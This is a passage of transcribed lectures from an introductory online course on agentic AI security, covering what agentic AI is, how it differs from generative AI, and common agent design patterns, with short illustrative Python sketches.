Transcripts
1. 1 - Introduction: Hello, everybody. Welcome. Welcome to this new course, which is the Agentic AI Security Master Class, learning how to secure AI agents from beginning to mastery. My name is Taimur and I'm your instructor for this course. Now, AI has evolved beyond, you know, GenAI models, to highly autonomous agents known as agentic AI. These AI driven agents, they can understand
their environment. They can make decisions and execute actions
without the need for any human being or any human oversight. Unlike traditional AI, which has typically helped you to generate content or make analyses and recommendations, agentic AI is designed to act independently
and dynamically, so it can adapt in real time to changing conditions,
which is amazing. Like, it's a gigantic
leap forward for AI. But this level of autonomy also creates new types of risks in cybersecurity and it completely changes the
dynamic, the threat landscape. And these risks go beyond traditional AI risks like data poisoning, model poisoning, adversarial attacks because agentic AI can
operate autonomously, like I said, and it can
interact with other AI agents. Securing these sort of systems is a new
type of challenge. So this is the reason
for this course. In this course, we can explore the unique challenges of
securing agentic AI and the new types of attacks
and how you can go about identifying these
risks and securing them. So what are you going to
learn in this course? You're going to learn
about the agentic AI landscape, what it is. What is agentic AI?
What do you have to do? What are the new types of threats and risks it is introducing? What is the difference between generative AI and agentic AI,
which is quite important. If you want to
understand the leaps which are happening
when it comes to AI. What are the use
cases? Like, what are the positive ways in which
you can use agentic AI? What are the risks of course? How do you threat
model agentic AI? Because agentic AI,
you cannot just threat model it like
any other application, and, of course,
securing agentic AI. Like, what are the controls? What are the mitigations
that you can put to secure this new type
of AI which has come about? Uh, okay, who is
this course for? Like, whom did I make
this course for? Now, this course is
for first of all, of course, cybersecurity
professionals. This course is for you. If you're a security architect, if you're at the C level, you're a CSO, you're a CTO, you're a chief risk officer. You are a GRC professional: governance, risk and compliance. Maybe you're a data scientist or a software developer who's interested in creating agentic AI, or maybe you are an AI and
machine learning engineer. Honestly speaking, the topics and the concepts I'm going to
be covering in this course, they apply to pretty
much any person who is interested in learning
how the world is changing, how the AI world is changing. And what are the prerequisites
for this course? Not much. You need to have a
basic knowledge of AI, basic knowledge of cybersecurity,
a desire to learn. Of course, you do
not need to have a deep knowledge of AI agents because I'm going to
teach you from scratch. I'm going to assume
that you do not know what agentic AI is,
what AI agents are, and then build up your
understanding so you have a good foundation before we deep dive into the security level. So first of all, like, who am I? Why are
you listening to me? A quick introduction
about myself and who am I and why
should be listening to me. My name, like I
said, is Taimur. I'm a multi award winning
cybersecurity professional. Sorry that picture is from a while back when I was much
younger and had more hair. But I am a speaker
and an instructor. I've been in cybersecurity
for the past 20 plus years. I'm also a cybersecurity
career coach. I have a small YouTube channel called the Cloud
Security guy where I publish weekly on things
about Cloud security, AI, and general
cybersecurity career advice. I'm also a best selling
author and course creator. I have, like, around 11
plus books on Amazon, around things like
cybersecurity, Cloud security. So just to show
you that I do know a little bit about the topics of AI and cybersecurity because I've been in this industry
for over two decades now. I have a newsletter,
also. You can connect with me on LinkedIn. Always happy to hear
from people and, like, find out,
get some feedback. So why should you care
about agentic AI? Like, why are you taking time out to learn about agentic AI? So, like I said, agentic AI is the next evolution of AI. Now, AI is evolving
beyond simple prompting, like you do with
generative AI, right? You prompt it, you get
some response back, then you prompted some more,
get some response back. We are now entering
the age of agentic AI, which is a gigantic
leap forward. So instead of generating text or prompts or image
and analyzing stuff, agentic AI takes
independent actions. Like I said, it learns
from its environment, and it's not just about
answering questions. It's about executing complex workflows,
automating decisions, and working towards long
term goals, complex, long term goals without any
or very little human input. And the reason this shift is so important is
because agentic AI transforms AI from, like, a passive tool to an
autonomous problem solver. Think about how generative
AI changed the world, right? When it came out in late 2022, when ChatGPT came out, how it revolutionized
creativity, content production,
I can assure you agentic AI is going to have an even bigger impact, enabling AI driven assistants,
automation systems, business intelligence
robots, all of these things are
going to come out and have a massive
impact, right? And this means that AI will
no longer be responsible, will no longer be dependent
on human beings to guide it. It'll be orchestrating
multiple steps. And this transition is very, very important because
businesses are looking to automate, cut cost. And that's why they're
going to be looking at agentic AI very, very closely. And agentic AI has very, very deep implications for cybersecurity, as we
are going to see. So this is just to give
you a brief overview of why agentic AI
is such a big deal. I found this to be very
funny. That's why you put it. So this is what
unfortunately a lot of people think about when they
think about agentic AI, it's going to be robot
taking over the people. This these ads were
run by a company. And honestly speaking,
I don't agree these ads were deliberately
designed to agitate people, make them angry,
you know, because they wanted to get
that publicity. But this is what a
lot of people think about when they think
about agentic AI that is going to be
robots taking over completely and completely replacing them. No, but tasks will get replaced a lot by agentic AI. It is going to have a massive
game changing impact. So I want you to
understand fully, have that mindset about
what agentic AI is. It is a game changer.
Like I said, we are moving away from simply prompting. Sorry, we're moving away from prompts, and we're moving towards tasks, okay? And we are giving proper
autonomy to agentic AI. Like, it's going to
be doing stuff by itself, end to end automation. So we're talking
about AI workers, even AI teams of workers. So multi agentic frameworks, which we're going to see shortly in the future
lessons, right? But at the same time, it is a game changer for cybersecurity
in a negative way, also. It is a significant
leap forward. New types of threats are coming new types of
attacks are coming out, it is going to amplify existing threats,
amplify existing risks. Why? All of it because of the
simple thing of autonomy. Because it is going
to be doing things by itself with very little
human oversight. This also introduces a new
type of attack, right? Previously, you could
train human beings. You could give them awareness,
give them training. But now we're talking
about agentic AI. How do you control their decisions? Who is accountable for the decisions that agentic AI makes? Is it the developer? Is it the company who
is responsible, right? So the attack surface
is expanded greatly. And lastly, which is the
most dangerous thing and which is the reason why
I'm making this course. Many companies like cybersecurity teams
they are completely unaware of the security
and compliance implications of agentic AI. Companies often they
want to implement new stuff and cut costs without understanding what
are the new types of threats they might be getting themselves exposed to. So that's why it's so
important to have things like this course and upskill yourself when it comes
to agentic AI. What are the challenges which have come about? So one of the biggest challenges is the overall lack of awareness around these unique security risks, right? Even a lot of companies, the
cybersecurity professionals, the risk professionals,
they are not understanding just how
different agentic AI is. There is a lack of best
practice frameworks also. Unlike traditional
cybersecurity, which has well established and mature frameworks like
NIST, ISO 27001, CIS, there is no widely adopted security standard
for agentic AI. You know, existing security
guidelines are there, like the NIST AI Risk Management Framework, the EU AI Act. They give you some direction, but they do not fully address
things like autonomy, decision making
processes or you know, the cross layer interactions of agentic AI, which we're
going to talk about. But this lack of a standardized
framework makes it very, very difficult for companies
to implement these tools. And of course, there is also a focus on security
tooling, too much focus. Many security teams feel
that they can just deploy more security tools and get themselves protected
against agentic AI, but this is a flawed approach. You know, these tools were not designed to monitor and
control autonomous AI. Instead, you need a
combination of governance, AI model integrity, threat
modeling to be very effective. And like I said,
a big problem is agentic AI security strategy either too high level.
What does that mean? They adopt companies
adopt broad like vague security policies on AI ethics governance without addressing the technical
security controls, or they are too low level. So they are only focusing on the security tooling
and threat detection without looking at the overall governance framework,
threat modeling. So this is where the
problem comes in, and this is the whole point
of this course to give you a proper balanced approach to equip you to armor you
for this new environment. So like I said, we are now well past the hype phase of agentic AI and entering practical applications. The
world is changing, right? Securing agentic AI
requires a new mindset, a new dedicated
security framework, and a shift from your
traditional approaches. So companies must invest in
these sort of approaches, and you are doing a great
thing by investing in this. So one thing before we
end the introduction, any knowledge that I give you, it will be lost
unless you apply it. So for the project, I'm going to give you a project about doing a threat model for an
agentic AI application, and I want you to focus
on that as we end this course because if you do
not apply this information, you're simply going
to be hearing me talk for a few hours and
then forget everything. So please do not do that. So that's the end of the introduction. I hope I've motivated you now to learn about agentic AI and the unique security risks it poses. Thank you very much,
and I'll now see you in the very first
lesson of this course.
2. 2 - What is Agentic AI : Hello, everybody. Now, welcome
to this lesson in which I'm going to be introducing
and talking about agentic AI, what it is, what's the overview. So if you have
limited knowledge of agentic AI or if you have
no knowledge of agentic AI, then this is the
lesson you really want to listen to and come back to. So like I said before, AI is evolving
very, very rapidly. Like so far, sometimes
it feels like we're in a science fiction
movie or something. You know, first, there was like predictive AI that
analyzes data, uses machine learning algorithms to predict future outcomes. That was the normal AI. Then we move to generative AI that creates new contents,
text, images, and music. And now we're talking
about agentic AI. Not only does AI
generate content, but it's able to
be conversational and autonomously act and react. That is the main thing, the autonomy, which defines agentic AI, as we're going to see. So what are we going to
talk about in this lesson? Like I said, we're going to talk about what is agentic AI? Like, what are the key features
that differentiate it? What is the agentic AI process? Like, how does
agentic AI do this, like magic, which it does? And why is it so important? Like, What's the big deal? Is it just another
trend, another hype, like something people are
hyping up to sell products? Or is it really
like a game change? When it comes to technology, when it comes to
artificial intelligence and how technology is evolving. So like I said, simple
definition of agentic AI. AI, you can define agentic AS, AI to take actions and make decisions with little
or no human oversight. That is it has autonomy. Like, you've seen those
self driving cars, it's able to take
action by itself without a need for a
human to oversee it. And it can break
complex goals down. Like, it can solve complex goals by breaking them down into smaller tasks. Like I said, what sets autonomous AI or agentic AI
apart from the previous types of AI that not only can it reason based on predictions
and everything, but it can also understand
what's happening and take actions and then adapt
and take more actions. And, you know, like
a complex workflow. The whole thing is
autonomy and adaptability. So that's why it is
very much poised to transform industries
like healthcare, finance, because
it can integrate data platforms and help with
time consuming jobs, right? Imagine AI that can act as digital labor, make decisions, and adapt
to new situations, the same way we expect
human beings to do. And a lot of people, they
get confused sometimes when they talk about
agentic AI and AI agents. Some people use it
interchangeably. Some people use it like
the one I'm using. So, I mean, they are used
interchangeably quite a bit. I've seen that, but they
are slight differences. So it's important
to differentiate between agentic
AI and AI agents. Essentially, simply put,
agentic AI is the framework. And AI agents are the building blocks
within that framework. So agentic AI I want
you to think is the broader concept of solving issues with
limited supervision, and whereas an AI agent is a specific component
within that system. That is designed to handle
tasks and like processes. So this is agentic AI, it operates through a series
of autonomous software, which we call AI agents. And these are these have the same capabilities
that we talked about, right? So this is what I want
you to understand. So this is how I want you
to understand when I talk about agentic AI and AI agents. And this is like they
said, this is really changing the way that
human beings are interacting with
AI agents because each agent can have its
individual goals and assignments, and they can work together with other agents without any
human being being involved. So within a large
agentic AI framework to solve complex goals. So what are the key
features of agentic AI? Like, what I talked
about this before, but just to drill
down a little bit, the key features are these ones, which is decision making. So because of the
predefined plans and like the machine
learning models that power them, they
can make decisions. Now, this might not seem very
different from normal AI, AI has the ability
to make decisions, which leads to the next feature, which is problem solving. So agentic AI usually uses, like, a four step process
for solving issues, which I'm going to
talk about perceive, reason, act, and learn. So these four steps start
by having like AI agents, agentic AI gather
and process data. Then usually at the back end, they use something
from generative AI, like an LLM, a large language model like ChatGPT, for example, to understand the data, to understand
the situation. And then what it does, it's
usually integrated with external tools and
APIs to take action. So that leads it to the next
point, which is autonomy. That is the main thing.
This is why I've made it bold and underlined it because this is what
makes it unique, its ability to learn
and operate on its own. That's what makes it a very, very powerful technology for companies that are interested. The next thing is interactivity. So due to its nature, agentic AI can interact with outside
environment, right? Gather data to
adjust in real time. For example, when I gave self driving vehicles which
are constantly analyzing their surroundings and making decisions in real time.
And lastly, planning. So agentic AI agents, they can handle
complex scenarios, and what they can do
is they can execute multi step strategies so they can break a task down into multiple
steps to understand it. So this is what I really
wanted you to understand. But what I really want you to focus on is the
problem solving part. So what is the agentic EI
process, like we talked about? I talked about these
four things, right? Perceive, reason,
act, and learn. So this is what agentic AI does when it tries to solve problems. The first step is perceive, so AI agents, they gather and they process this information. This can be through
sensors, databases, APIs to turn data
into insights, right? They find out, hey,
what do I need to do? What is the person, the human being which
is talking to me? What does he want me to do?
Now, the next step is reason. This is where usually
generative AI at the back end, there might be, like, a large language model, like, say, ChatGPT, and it guides
the reasoning process. It understands the tasks,
it finds a solution, and it coordinates
with the other models to do the actions which
the user is asking. The next step is acting. So now the agent
performs tasks by connecting with external
systems through APIs, you know, and it can have built in
guardrails to make sure that you're not
violating security. Maybe if you have an
agent which is limited to, like, processing claims, then you can make
sure that it can only process claims
up to $10,000. Anything above that, you
need a human being, right? So this is the act part. And lastly, learn, which is very, very important: agents, they evolve through feedback, and they get better
with every interaction so that the next time
the decision is better, the next time this
process is better. This continuous improvement is what makes AI smarter. So this is how the overall agentic AI process works, like the mechanics of agentic AI. They are designed to foster autonomy, adaptability, and efficiency through these four steps, which you can see. A small illustrative sketch of this loop follows below.
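To make these four steps a bit more concrete, here is a tiny, purely illustrative Python sketch of the perceive, reason, act, and learn loop, including the kind of claims-limit guardrail mentioned above. The function names and the $10,000 threshold are assumptions for the example only, not any real framework.

```python
# Purely illustrative sketch of the perceive -> reason -> act -> learn loop.
# call_llm() is a hypothetical placeholder standing in for a real LLM call;
# the $10,000 claim limit is an assumed guardrail taken from the example above.

CLAIM_LIMIT = 10_000  # guardrail: anything above this gets escalated to a human


def call_llm(prompt: str) -> dict:
    """Stand-in for a GenAI/LLM call; a real agent would call a model here."""
    return {"action": "process_claim", "claim_amount": 4_200}


def agent_loop(user_request: str, memory: list) -> str:
    # 1. Perceive: gather the request plus any context (sensors, databases, APIs)
    observation = {"request": user_request, "history": list(memory)}

    # 2. Reason: use an LLM at the back end to decide what to do
    plan = call_llm(f"Decide how to handle this request: {observation}")

    # 3. Act: execute via external tools/APIs, but only within the guardrail
    if plan.get("claim_amount", 0) > CLAIM_LIMIT:
        result = "Escalated to a human reviewer (above the claim limit)."
    else:
        result = f"Processed claim for ${plan.get('claim_amount', 0)}."

    # 4. Learn: store the outcome so the next decision can be better
    memory.append({"observation": observation, "plan": plan, "result": result})
    return result


memory: list = []
print(agent_loop("Please process my insurance claim", memory))
```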
about so many uskases. For example, in customer
service, EI agents, they can offer further
personalized interactions, offer proactive service, and handle multi channel
support if it says these AI agents can gain leads and move them down the pipeline
without a human being, maybe book meetings, answer questions, day or night, right? And marketing, they can handle campaigns from creation
to optimization. I mean, the use cases are literally like endless,
honestly, speaking. And that is what leads
to my next point, which is why is it important? A lot of people, they
come to me and they say, agentic AI is just hype. There's no way it's going to be as big as generative AI, and I beg to differ. Even if you go to Google Trends, just search for agentic AI; after generative AI, we are now seeing this huge... this is the next giant step forward when it comes to AI applications
and AI technology. Definitely, agentic AI is
not going away anytime soon. I mean, if you look at the
top technology trends for 2025, which Gartner just released, and, you know, we are moving past the hype phase. So even Gartner has said that the number one, the most important thing that is there is agentic AI, because it will introduce a goal driven
digital workforce. You're going to have
an army of AI workers, AI agents doing tasks for you autonomously, making plans and taking decisions, as an extension of the workforce, which is very scary
because they don't need to have vacation, take benefits. They're not going to replace
humans anytime soon, but definitely the AI is going to take away a lot of
the tasks which are there. It's going to make
new jobs, also. I don't want you
to think that it's going to take away your job, but definitely there's going to be massive job disruption. And you can see all the big giants like
Microsoft, Apple, Amazon. All of them are jumping
into the agentic AI craze. It's the same with any report you can take a look at, be it from the Big Four, be it from the World Economic Forum, from Gartner: all of them say that agentic AI will dramatically upskill workers and teams, and it's going to lead to a large amount of job disruption
within the market. I just read this recent
report, you know, from Gartner, and they were saying how companies
need to rethink how customer service issues
are resolved because AI agents have the
ability by 2029, they predict it's going to solve 80% of common customer
service issues. So customers are going to
be leveraging agentic AI, whether you like
it or not, whether you are ticked off
about it or not, it doesn't matter
because agentic AI is here, and it is going to take away a lot of the
interactions there. I'm going to put the links
for all these reports, so you can take a
look at it also. So one thing I want to talk about the evolution
of AI agents. A lot of people sometimes
they come to me and they say, Hey, we already have dealt
with this before, you know, agents like customer
service agents, you go to a website,
you see the chatbot. So what's the big deal? It's the same thing. No, there has been an evolution, which this page from the World Economic Forum, which I found very, very useful, shows: just how AI agents have evolved, if you look at the top, from deterministic to non deterministic and to
the current state. So what do I mean
by deterministic? So deterministic agents
were like, you know, the chatbots, rule based
fixed logic and predefined. So same input, you
get the same result. Very, very limited in
their interactions. Those standard
chatbots, you know, people get frustrated
dealing with them. You keep asking it like questions
it's not able to answer because it's
expecting the answer in a very specific
format, right? So slowly, slowly, we move towards non
deterministic AI agents, which are data driven, and they use things like machine learning to predict outcomes. And the results may vary based on the
learned type of data, but slowly slowly this
improvement was there. And now, like the current state, which is there because of generative AI, machine learning, large language
models like ChatGPT, allowing AI to process
vast amounts of data. And now we are moving towards
something like multi agents where AI agents will work
together in real time, without any human beings, it's agents talking to each other, understanding each other, and optimizing the
decisions collectively. So this is what I
really want you to look at that AI is
transitioning away from single isolated agents to collaborative multi
agent systems that inter learn and make
independent decisions, this whole shift which is
happening and why this is the next step from
generative AI to agentic AI. And lastly, I want you
to understand that agentic AI may even change how we interact
with applications. You know, the business
layer. How do you interact with
applications today? Usually, be it a
mobile application, a desktop application like
old legacy application, within your workforce, within
your office environment, you interact with applications, and then the back end
there's a database, right? I mean, it's very
simplistic, but I'm just trying to
make you understand. So you have applications
and they are interacting with databases or data
stores at the back end. And this is how you do your
job, basically, right? When it comes to agentic AI, it even has the potential to
remove this business layer. I mean, remove it from you,
it will still be there. But the agentic AI
might be interacting directly with the databases directly with the applications. So this is like what
people are thinking about. So this is just how much
they may disrupt because the ability to automate workflow,
connect with databases, deliver outcomes
without the need for interacting any user is a direct challenge
to how we think about business applications, you know, the business layer. So this is really the essence of how disruptive
agentic AI can be. So I hope I've shown you now just how amazing agentic AI
has the potential to be, I mean, how quickly
it's evolving and how much disruption we can expect to see in
the coming years. So this was a quick
overview about agentic AI. I hope this gives
you a good idea about what agentic AI is. Like I said, I'll put the
links for the things I talked about within the course
resources, so take a look. And remember, it is autonomy. The keyword autonomy is what sets it apart. And we talked about the
agentic AI process also. So in the next lesson,
now I'm going to talk about a key question
which gets asked a lot, which is what's the difference between generative
AI and agentic AI? Like, I've explained
it to you already, but I really want to
show you a difference and how they differ and where
they are sync together. So I'll see you in
the next lesson. Thank you very much.
3. 3 - Agentic vs GenAI: Hello, everybody.
Welcome to this lesson. Now in this lesson,
I'm going to just dive a little bit deeper into a topic we touched upon briefly, which is the difference between generative
AI and agentic AI. Now, both GenAI and
agentic AI are like tools that offer amazing
productivity benefits to companies and people. But it's important to
differentiate between the two and how
each of them works a little bit differently
and where the overlap happens because I've seen a lot of times people get confused. About how these
two things differ. So this is what we're going to be covering in this lesson. Basically, the
differences between generative AI and agentic AI, and when to use which, because there are different use cases for each type of AI, which we're talking about here. So we've already covered agentic AI, right? I've talked before
that the agentic AI describes those AI systems
that can work autonomously, which is without
human oversight. They can make decisions, take actions. They can pursue complex goals with very limited supervision. So at the end of the day, it might be using some sort of LLM or GenAI at the back end for reasoning. But the main thing is its autonomy. It doesn't need a
human being to be prompting it to keep
asking it questions. So this is how it solves
those complex goals, right? Like we talked about, it
has a reasoning layer. It understands, it perceives what the problem is, it breaks it down, and then solves it, all without human
interaction being there. When we talk about
generative AI, now, generative AI, it refers
to a subset of AI, right? And like models and
techniques that are designed to create or
generate new content, such as images, text, music, even videos, right? I mean, anybody who has been on the Internet knows
about ChatGPT, how the world changed after late 2022. Unlike traditional AI models, that used to be trained to recognize and classify existing data, generative AI, it
changed the game, right, because it's capable
of producing new content. And usually these models, they are trained on deep
learning algorithms, and they learn from
this data and they understand the statistical
relationship between the text, between the images,
and once trained, they can now generate
new content, right? So this is where the focus is. This is how basically
it looks like, right? You have these
foundational models. These are basically
machine learning models that are trained on a
large amount of data. And once it's trained, it understands, what do you call it, the statistical relationships in the data. It understands what the data looks like, and now it can
generate new data, which you use typically
through prompts. So you're prompting
it, Hey, write me this article,
generate this image, generate this video
because it has been trained on vast amounts and vast amounts of data. It uses this to
generate new content. So this is what generative AI is. And here, in a quick table, you can look at the difference which is there. Agentic AI's focus is on autonomy; generative AI's focus is on content. Agentic AI can solve problems and execute multi step strategies, all without human input. And generative AI, it can analyze vast amounts of data and find patterns, which it uses to generate new types of data. So one very important
thing now: agentic AI does a lot of times use generative AI, like a large language model, something like ChatGPT, at the back end for reasoning. But what it does is it adds layers
and layers on top of it. It allows it to break it down, make decisions, make
automations, right? So this is like we talked about: the perceive, reason, act, and learn. So that thing is there, but the main thing is autonomy. And with generative AI, it's
usually focusing on content. And again, generative AI, it might have some
level of autonomy. A lot of applications, you see, they have some sort of autonomy where you have a generative AI, it's talking to people, it's calling APIs. So sometimes there's this overlap which is there, but I just want
you to understand. So when to use agentic AI, agentic AI is best used when you require the AI to act
by itself, right? Autonomy, you want
it to be autonomous, make decisions and execution, rather than just
content creation. So I'm a security guy, so let's talk about some
cybersecurity use cases. A company wants to implement
something which does real time automated threat
detection and response, right? They want to cut down on
their SOC team costs. There they can probably use agentic AI to monitor security logs. It will detect anomalies. It can then take action. It can isolate compromised accounts and automatically execute security playbooks. You might be thinking, Hey, these things are already there; well, agentic AI will take it to the next level, because it can break the problem down and make decisions similar to the decisions a human being would make, right? This is basically taking it to the next level. A tiny, hedged sketch of such an autonomous response loop is below.
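Just to make that concrete, here is a toy, hedged Python sketch of what such an autonomous detect-and-respond loop could look like. The log format, the failed-login threshold, and the playbook action are all made-up placeholders for illustration, not a real SOC integration.

```python
# Toy sketch of an autonomous detect -> decide -> respond loop for a SOC agent.
# All thresholds, log formats, and actions are illustrative assumptions.

SUSPICIOUS_FAILED_LOGINS = 5  # assumed anomaly threshold


def fetch_security_logs() -> list:
    """Placeholder for pulling events from a SIEM; returns canned demo data."""
    return [
        {"account": "jdoe", "event": "failed_login", "count": 7},
        {"account": "asmith", "event": "failed_login", "count": 1},
    ]


def isolate_account(account: str) -> None:
    """Placeholder containment playbook: disable the account and revoke sessions."""
    print(f"[playbook] Disabling account and revoking sessions for {account}")


def soc_agent_run() -> None:
    for event in fetch_security_logs():
        # Detect: a very naive anomaly rule standing in for the agent's reasoning
        if event["event"] == "failed_login" and event["count"] >= SUSPICIOUS_FAILED_LOGINS:
            # Respond: execute the containment playbook autonomously
            isolate_account(event["account"])
        else:
            print(f"[ok] No action needed for {event['account']}")


if __name__ == "__main__":
    soc_agent_run()
```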
Similarly, for automated IT operations, you can have an agentic AI detecting server failures, predicting downtime, restarting services, all acting autonomously. Again, you might be
saying, Hey, don't we have these things like load balancers? But again, agentic AI is all about taking it to the
completely next level, almost reducing the human
element which is there, right? So this is where you would
be using agentic AI. Now, when do you
use generative AI? This would be suited for
more like things like content creation enhancement
rather than autonomy. So a marketing team wants to
generate weekly blog posts. This is where you would
use something like generative AI, Claude or ChatGPT, or you have a team which wants
to do software development. Now, you need assistance in
writing or debugging code. Again, generative AI, right? To generate code, something like Q Developer from Amazon, GitHub Copilot, Microsoft Copilot, those sort of things
would come into play. So this is like a short lesson because I wanted
to be very clear, sometimes I've seen people
get confused between the two, and I want you to have this
absolute difference between agentic AI and generative AI before we talk about security. So I hope this was
useful to you, and I'll see you in
the next lesson.
4. 4 - Agentic AI Patterns: Hello, everybody.
Welcome to this lesson. Now, we have a very good
foundation now in agentic AI. Now, what I want to talk about in this lesson is agentic AI design patterns, which is, when we see agentic AI in practice,
agentic AI in practice, what are the different
types of design patterns, the different types of
architectures that are there? So this is what we're going to be covering in this lesson, the types of patterns, the
types of architectures, and how they differ
and how they converge. You might see more,
you might see less in other courses
or documentation. But typically, the ones
I'm talking about here, they are the ones
which are the most common and almost all
of them the same. They will come in one form, another from the ones I'm going
to be talking about here. So when we talk about
agentic AI patterns, we talk about design
patterns like the building blocks of how agents work, right? And these are not, like, separate things. It's very possible
they are combined, but they can help you to
understand, like agents, and they can help you with
the security also later on when we are looking at threat modeling and finding
out the security issues. So agentic AI design patterns, usually they are
reflection, tool usage, planning and reasoning, and multi agent. I'm going to be covering them. And this is based on Andrew Ng. He's, like, considered to be the primary, I would say, authority on agentic AI, generative AI, one of the best minds in the business. I'm going to link the article which I've used as reference for the ones
I'm talking about here. So do check that out
also if you want to deep dive further
into this topic. So let's take a look at the first one,
which is reflection. Now, what do I mean by the reflection pattern in agentic AI? Now, today, as of today, when you use something like generative AI, like a large language model like ChatGPT, you usually use it in
zero shot mode, right? Which is you prompt
a model and you ask for something like write me a report and it
says, Hey, here you go. And then you look at it, maybe you might say, Hey, there are some mistakes, or you wanted it done a different way. You might have had experience of prompting ChatGPT or Claude or Gemini, and the first output is not satisfactory. You deliver critical feedback to it to help the LLM to improve its response and then get a
better response. So this is what
you typically do. Now, what if you could
automate this process of delivering critical
feedback so the model automatically analyzes
and criticizes its own output and improves its response until it is
as perfect as it could be. This is what I'm
talking about when I talk about reflection, which is agentic AI. Now, you take the task of doing this and you actually
offload it to an agentic AI. So you ask the AI agent, Hey, write me a report. Here you go. It will keep on improving. It'll do it all without you interacting with it, until it is actually perfect, the way you want it to be. So now, take this example, not just for a report. You can apply it to code also, right? Hey, write me this code and keep on improving it. Keep on iterating until it
is absolutely perfect, and then it's
delivered to a human. So instead of having the LLM, generate its output directly
and sending it to you, agentic AI in the reflection pattern would prompt the
LLM multiple times, give it opportunity
to build step by step and improving
the quality. So this is why. And now
you might be thinking, Hey, why don't we
just do it one time? Well, because it works; it actually improves. You will see. I mean, just like you can see that when you prompt ChatGPT and you give it more feedback, it keeps on improving, keeps on improving. With this pattern, people have seen, like, remarkable results, and it actually improves
upon what you're saying, and you get a much more refined and improved product, as opposed to what you could get the very first time. So this is the first design pattern, which is reflection; a minimal sketch of the idea is below.
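Here is a minimal sketch of that reflection loop in Python. The generate() and critique() functions are hypothetical stand-ins for two LLM calls, and the fixed number of rounds is just an assumption to keep the example short.

```python
# Illustrative reflection loop: draft, self-critique, revise, repeat.
# generate() and critique() stand in for LLM calls; they are not a real API.

def generate(task: str, feedback: str = "") -> str:
    return f"Draft for '{task}' (incorporating feedback: {feedback or 'none'})"


def critique(draft: str) -> str:
    # In a real agent this would be another LLM call reviewing the draft.
    return "Tighten the introduction and add sources."


def reflect(task: str, rounds: int = 3) -> str:
    draft = generate(task)
    for _ in range(rounds):
        feedback = critique(draft)        # the model criticizes its own output
        draft = generate(task, feedback)  # and improves it, without the user stepping in
    return draft


print(reflect("write me a report on agentic AI"))
```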
The next pattern is tool usage. Now, you might be already familiar with, like, you know, things like ChatGPT or other LLMs that can perform a web search or execute some code. A lot of tools already
have that, right? And this is the same
thing with agentic AI, but we are going
way beyond here. So you might ask an AI agent, Hey, what are the best
hotels in my area? Now, the agentic AI, it would execute tools, right? It would do a web search. Maybe once it finishes the web search, it downloads the results, then it does some code execution to get you the very best answer. And so tool usage is really extending the ability of agentic AI. Now
it's taking actions. So this is the one
you might ask, Hey, if I invest $100 at compound interest for 12 years, what will be the return, right? So rather than trying to generate the answer directly, which might not give you the best answer, the agentic AI, it might use an LLM at the background, do a web search, and then write some Python code, all of it executed, and then give you the result. So that was the second pattern: the first was reflection, the second was tool usage. A rough sketch of this tool idea is below.
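As a toy illustration of tool usage, here is a sketch where the "tool" is just a small Python function for compound interest that the agent would execute, instead of letting the LLM guess the number. The 5% annual rate is an assumed value, since the example above does not specify one.

```python
# Toy "tool" the agent can execute instead of having the LLM estimate the answer.
# The 5% annual rate is an assumed value for illustration only.

def compound_interest(principal: float, annual_rate: float, years: int) -> float:
    """Return the future value of principal compounded yearly."""
    return principal * (1 + annual_rate) ** years


# The agent's reasoning step decides to call the tool with the user's numbers:
future_value = compound_interest(principal=100, annual_rate=0.05, years=12)
print(f"$100 at 5% compounded yearly for 12 years grows to ${future_value:.2f}")
```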
What's the third one? It is planning and reasoning. This is where really
the magic starts to happen when it
comes to EI agents, which is multi step planning, which is where you break down complex problems into tasks, and each task is
executed separately. So you might ask it,
Hey, find and book me the best vacation for me in Sweden, right? The AI agent will do a web search. At first it'll understand, it'll perceive. Then it'll break it down, using something like an LLM at the background: Hey, I need to do a web search, I need to do a comparison, I need to do a hotel booking, I need to do a flight booking. So all of these, the problem, it'll break it down and start executing it step by step, improving
upon it, right? So a lot of people, you know, they had this magical moment
with ChatGPT once it was released, when they played with it, and they said, Hey, this is pretty awesome, I never thought AI could do this. And honestly, if you look at planning and reasoning, this is where the magic
out the agent, and you see that it's breaking your problem down
into multiple small, small tasks and
executing it and then making mistakes and
then learning of it all without you
doing anything. This is where you really
like the light bulb goes off in people's
heads and they see the magic which
agentic AI can do. So this is where really the
magic is happening and where people will see the
power of agentic AI. So a lot of people say, why can't we just do it in a single step or a single tool. But honestly, this
is why the power of agentic comes because
it breaks it down. And by breaking it down into
separate separate tasks, it can see what is working,
what is not working. The tasks which are not working, it will learn from it,
it'll improve upon it. So this is where it
decomposes the task, structured way of reasoning, and, you know, triggering
tools, understanding it. This is truly the power of
agentic A you start to see. And lastly, we want to talk
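A very rough sketch of that decomposition step follows, assuming hypothetical plan() and execute() helpers that would normally be LLM and tool calls.

```python
# Rough sketch of multi-step planning: break a goal into sub-tasks, execute each,
# and keep the results for the next step. plan() and execute() are placeholders.

def plan(goal: str) -> list:
    # In a real agent an LLM would produce this breakdown dynamically.
    return ["search flights", "compare hotels", "book flight", "book hotel"]


def execute(step: str, context: dict) -> str:
    return f"done: {step}"


def run(goal: str) -> dict:
    context = {"goal": goal}
    for step in plan(goal):
        context[step] = execute(step, context)  # each sub-task builds on earlier results
    return context


print(run("find and book me the best vacation in Sweden"))
```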
And lastly, let's talk about multi agent patterns, which is multiple agents
working together. So you might give an
example, like, Hey, create this application for me, you give it to a
project manager agent. The project manager agent will call another agent which is
similar to a technical lead, and you will have
a coding agent, a solution design agent, a security agent, all of them working together to
create an application. This is not theory. This
is actually happening. You might be thinking, why
don't I just use one agent? Well, similar to how a typical
software company works, you don't have one
guy doing everything, right? You have multiple people. One is good in coding, one is good in solution design, one is good in security. They are being overseen
by a technical lead and who is reporting
to a project manager. This is the same concept. Like, you know, given a
complex task writing software, the multi agent
approach would break the down into sub
tasks and each of it is being executed
by different agents. So like I said, people say
that why are we doing it? Why can't just one agent do it? But the thing is, it works. Many teams get amazing
results by focusing on this. Why? Because all these
agents working together, learning from
together, the output is considerably better. There are many, many
papers on this, which have shown that using a multi agent collaborative approach gives considerably better results. And, you know, same thing with LLMs, like with ChatGPT, once you prompt it and you give it the feedback, the multi
agent patterns are pretty amazing in the number of outputs they can give
you and the number of improvements they can give you because you will have a
project manager agent looking at the technical lead, the technical lead agent is interacting with the coding agent, the solution design agent, security agent, and, you know, it gives you a framework for breaking down all these tasks into simpler tasks. Each of the agents
is optimized for its particular type of role that is there. So this was the
multi agent pattern. So now you've
understood the pattern. Like I said, these are
the building blocks. Now, let's talk about
the architectures. Now, the architecture is how this is actually
implemented in practice, you know? These were theories. So these are the
design patterns, how this is actually
